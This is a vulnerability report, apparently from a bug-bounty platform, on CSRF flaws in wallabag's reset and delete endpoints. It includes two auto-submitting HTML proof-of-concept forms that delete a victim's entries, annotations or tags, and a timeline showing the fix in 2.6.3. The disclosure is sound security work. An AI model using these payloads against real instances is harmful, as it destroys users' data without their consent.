Several CSRFs in Reset Area and Delete Entry Action in wallabag/wallabag

Valid

Reported on

Mar 8th 2023


Description

I find wallabag suffering several Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete the victim user's annotations, entries and tags by the GET request to /reset/annotations, /reset/entries, /reset/tags, /reset/archived, as well as /delete/[Entry ID], in which the [Entry ID] can be estimated easily as it is indexed from 1 and increased by 1 when a new entry is added. The attackers can simply craft all these dangous actions in one link and then drive the victim to detele them all in one click.

Proof of Concept

For /reset/annotations Login as a user. Open the following HTML file in the browser.

// PoC.js
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.com/reset/annotations">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

For /reset/entries, /reset/tags and /reset/archived, we can simply modify the above PoC by changing annotations to entries, tags or archived.

For /delete/[Entry ID] Login as a user. Find an entry ID, here we find the [Entry ID]=10. Open the following HTML file in the browser.

// PoC.js
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.com/delete/10">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

The added entry has been deteleted.

Impact

This vulnerability is capable of tricking a victim to delete arbitrary or even worse all of his/her entries/annotations/tags in the victim's account.

We are processing your report and will contact the wallabag team within 24 hours. a year ago
Peng Zhou modified the report
a year ago
We have contacted a member of the wallabag team and are waiting to hear back a year ago
Peng Zhou modified the report
a year ago
Peng Zhou modified the report
a year ago
Nicolas Lœuillet validated this vulnerability 8 months ago
zpbrent has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nicolas Lœuillet marked this as fixed in 2.6.3 with commit 78b0b5 6 months ago
Nicolas Lœuillet has been awarded the fix bounty
This vulnerability has now been published 6 months ago
Nicolas Lœuillet gave praise 6 months ago
Thank you @zpbrent !
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation